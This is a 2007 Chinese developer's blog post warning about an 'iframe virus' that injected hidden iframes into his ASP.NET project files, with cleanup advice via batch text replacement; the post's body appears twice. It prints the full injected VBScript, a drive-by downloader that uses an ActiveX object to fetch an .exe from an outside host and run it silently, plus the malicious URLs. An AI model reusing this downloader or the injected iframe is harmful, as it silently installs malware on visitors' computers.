07-12
27
iframe病毒
作者:Java伴侣 日期:2007-12-27
中了“落雪”、“威金”、“熊猫烧香”病毒
有些符合“落雪”病毒的特征。
你的所有*.exe文件图标是否已被修改?
你的任务管理器里是否有新的可疑进程?
如果你有一款杀毒软件,就进入安全模式,全盘扫描杀毒。
如果你没有一款杀毒软件,建议安装微点主动防御软件(1.2.10569.0036):http://www.micropoint.com.cn/
10月18日
所有的网页开发者注意了——iframe病毒,严重!!!
近几日公司电脑终于承受不住大量木马以及间谍软件的强奸,在悲愤中自杀了。
原来装的双系统(C下是2000 ad server E下是xp sp2),做asp.net 由于2k故障后来一直没用,一直都用xp。由于安全措施不足,加上需要经常上网查资料、下载工具等等,xp下的木马 越积越多(不是我不想高它们,是它们现在手段太高,怎么搞也搞不死),最后无奈,重装2k。(已经是标准的木马库了见图1)
ifram病毒的发现:
刚刚装的系统没什么太大问题,赶紧ghost,装完必备工具,再ghost一遍,装sql2k,.net2003,再ghost。
刚好有个项目要维护,需要该几个页面,附加好数据库,设好虚拟目录,发现项目编译错误,怪异的是连resx文件都出错,打开文件发现最下方出现
感觉怪异,打开http://222.208.183.246/htm/jh.htm,发现是空页(各位请不要使用IE尝试,保证你中招,偶也是吃了IE得亏,不敢再用,用的Opera),查看源码发现
再打开,发现一站长统计,感觉不应该如此而已,再看源码(上部分为中国站长统计编码没有问题)
<script src='http://s69.cnzz.com/stat.php?id=266245&web_id=266245' language='JavaScript' charset='gb2312'></script>
<iframe src="wm.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
打开wm.htm,源代码如下
<script language="VBScript">
call show ("http://down.136136.net/down/da%2Eexe","heng.com")
sub show(Urls,fname1)
on error resume next
xx="object"
xxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
xxxx="classid"
xxxxx="Microsoft.XMLHTTP"
xxxxxx="Adodb.Stream"
xxxxxxx="GET"
xxxxxxxx="Scripting.FileSystemObject"
xxxxxxxxx="Shell.Application"
xxxxxxxxxx="open"
Set heng = document.createElement(xx)
heng.setAttribute xxxx, xxx
Set heng1 = heng.CreateObject(xxxxx,"")
Set heng3 = heng.createobject(xxxxxx,"")
heng3.type = 1
heng1.Open xxxxxxx, Urls, False
heng1.Send
Set heng2 = heng.createobject(xxxxxxxx,"")
Set tmp = heng2.GetSpecialFolder(2)
fname1 = heng2.BuildPath(tmp,fname1)
heng3.open
heng3.write heng1.responseBody
heng3.savetofile fname1,2
heng3.close
set QQ1111111 = heng.createobject(xxxxxxxxx,"")
QQ1111111.ShellExecute fname1,"","",,0
end sub
's s~
</script>
大意估计应该为自动下载安装一个ActivX,关键是IE连个提示都没有(强烈bs IE 强烈874MS 强烈874搞这些玩意儿了,给程序员们抹黑)
查看一部分aspx文件发现都被修改,无奈搜索同一时间修改的文件发现统统被改了(图2)
ifram病毒处理办法(恢复网页文件):
google搜索到的信息如下:次病毒会在系统目录下生成*.exe文件(如果你进程里发现了1.exe这样的进程,你就要小心了99%中招了,当然排除你的某个项目就叫1.exe,有刚好在运行),开机时会自动运行,修改你硬盘上的网页文件,我知道的就有aspx,asp,html,htm,resx,shtml.连系统帮助也不放过。
病毒的处理方法迄今为止偶还不知道,因为xp系统坏掉了,也不敢再冒这个险了,有谁知道的说一声哦。下面说一说文件的恢复方法(算写这东西的小子还有点良心,没把页面代码改乱,不然真完了,十几个项目源程序都在我机器上),
到华军下载Batch Text Replacer(以后决不到乱七八糟的网站上下载工具了),选择你的文件夹为硬盘,最好是每个盘都选上,选择包括所有子文件夹。文件类型将所有你知道的网页类型写上(asp.net开发者记得resx文件)。字符串就是病毒给你写的那段,替换为空,好了 开始替换吧。。。。。
各位一定要小心了,先打开自己项目看看有没有问题吧,幸亏病毒修改完文件后没有给客户更新,否则.......
有些符合“落雪”病毒的特征。
你的所有*.exe文件图标是否已被修改?
你的任务管理器里是否有新的可疑进程?
如果你有一款杀毒软件,就进入安全模式,全盘扫描杀毒。
如果你没有一款杀毒软件,建议安装微点主动防御软件(1.2.10569.0036):http://www.micropoint.com.cn/
10月18日
所有的网页开发者注意了——iframe病毒,严重!!!
近几日公司电脑终于承受不住大量木马以及间谍软件的强奸,在悲愤中自杀了。
原来装的双系统(C下是2000 ad server E下是xp sp2),做asp.net 由于2k故障后来一直没用,一直都用xp。由于安全措施不足,加上需要经常上网查资料、下载工具等等,xp下的木马 越积越多(不是我不想高它们,是它们现在手段太高,怎么搞也搞不死),最后无奈,重装2k。(已经是标准的木马库了见图1)
ifram病毒的发现:
刚刚装的系统没什么太大问题,赶紧ghost,装完必备工具,再ghost一遍,装sql2k,.net2003,再ghost。
刚好有个项目要维护,需要该几个页面,附加好数据库,设好虚拟目录,发现项目编译错误,怪异的是连resx文件都出错,打开文件发现最下方出现
感觉怪异,打开http://222.208.183.246/htm/jh.htm,发现是空页(各位请不要使用IE尝试,保证你中招,偶也是吃了IE得亏,不敢再用,用的Opera),查看源码发现
再打开,发现一站长统计,感觉不应该如此而已,再看源码(上部分为中国站长统计编码没有问题)
<script src='http://s69.cnzz.com/stat.php?id=266245&web_id=266245' language='JavaScript' charset='gb2312'></script>
<iframe src="wm.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
打开wm.htm,源代码如下
<script language="VBScript">
call show ("http://down.136136.net/down/da%2Eexe","heng.com")
sub show(Urls,fname1)
on error resume next
xx="object"
xxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
xxxx="classid"
xxxxx="Microsoft.XMLHTTP"
xxxxxx="Adodb.Stream"
xxxxxxx="GET"
xxxxxxxx="Scripting.FileSystemObject"
xxxxxxxxx="Shell.Application"
xxxxxxxxxx="open"
Set heng = document.createElement(xx)
heng.setAttribute xxxx, xxx
Set heng1 = heng.CreateObject(xxxxx,"")
Set heng3 = heng.createobject(xxxxxx,"")
heng3.type = 1
heng1.Open xxxxxxx, Urls, False
heng1.Send
Set heng2 = heng.createobject(xxxxxxxx,"")
Set tmp = heng2.GetSpecialFolder(2)
fname1 = heng2.BuildPath(tmp,fname1)
heng3.open
heng3.write heng1.responseBody
heng3.savetofile fname1,2
heng3.close
set QQ1111111 = heng.createobject(xxxxxxxxx,"")
QQ1111111.ShellExecute fname1,"","",,0
end sub
's s~
</script>
大意估计应该为自动下载安装一个ActivX,关键是IE连个提示都没有(强烈bs IE 强烈874MS 强烈874搞这些玩意儿了,给程序员们抹黑)
查看一部分aspx文件发现都被修改,无奈搜索同一时间修改的文件发现统统被改了(图2)
ifram病毒处理办法(恢复网页文件):
google搜索到的信息如下:次病毒会在系统目录下生成*.exe文件(如果你进程里发现了1.exe这样的进程,你就要小心了99%中招了,当然排除你的某个项目就叫1.exe,有刚好在运行),开机时会自动运行,修改你硬盘上的网页文件,我知道的就有aspx,asp,html,htm,resx,shtml.连系统帮助也不放过。
病毒的处理方法迄今为止偶还不知道,因为xp系统坏掉了,也不敢再冒这个险了,有谁知道的说一声哦。下面说一说文件的恢复方法(算写这东西的小子还有点良心,没把页面代码改乱,不然真完了,十几个项目源程序都在我机器上),
到华军下载Batch Text Replacer(以后决不到乱七八糟的网站上下载工具了),选择你的文件夹为硬盘,最好是每个盘都选上,选择包括所有子文件夹。文件类型将所有你知道的网页类型写上(asp.net开发者记得resx文件)。字符串就是病毒给你写的那段,替换为空,好了 开始替换吧。。。。。
各位一定要小心了,先打开自己项目看看有没有问题吧,幸亏病毒修改完文件后没有给客户更新,否则.......
评论: 0 | 引用: 0 | 查看次数: 1178
发表评论